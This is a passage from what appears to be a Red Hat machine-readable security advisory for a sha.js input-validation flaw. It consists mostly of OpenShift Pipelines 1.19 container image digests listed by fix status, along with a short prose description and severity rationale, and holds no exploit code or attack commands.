"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2389980"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in sha.js, where the hashing implementation does not perform sufficient input type validation. The .update() function accepts arbitrary objects, including those with crafted length properties, which can alter the internal state machine of the hashing process. This flaw may result in unexpected behavior such as rewinding the hash state, producing inconsistent digest outputs, or entering invalid processing loops. The issue was introduced due to the reliance on JavaScript object coercion rules rather than enforcing strict buffer or string inputs.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "sha.js: Missing type checks leading to hash rewind and passing on crafted data",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability was marked as Important rather then Critical because while the lack of input type checks in sha.js allows for hash state rewinding, crafted collisions, and potential denial of service, the vulnerability requires highly specific crafted input objects that are unlikely to occur in typical real-world usage, especially since most applications pass well-formed strings or buffers to hashing functions. Moreover, the cryptographic breakages described, such as nonce reuse leading to private key extraction, are indirect and depend on downstream libraries misusing sha.js for sensitive operations without additional validation layers. As a result, the flaw significantly undermines correctness and robustness of the hashing API, but its exploitability in common production systems is constrained, which could justify viewing it as an Important vulnerability rather than a Critical one.\n\n\nThe flaw requires applications to pass attacker-controlled, non-standard JavaScript objects into hash.update(). Most real-world Node.js applications and libraries already use Buffer, TypedArray, or String inputs, which are unaffected. Furthermore, Node\u2019s built-in crypto module, which is widely adopted, enforces stricter type-checking and is not impacted. As a result, the vulnerability mainly threatens projects that (a) directly depend on sha.js for cryptographically sensitive operations, and (b) hash untrusted input without type validation.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64"
],
"known_not_affected": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
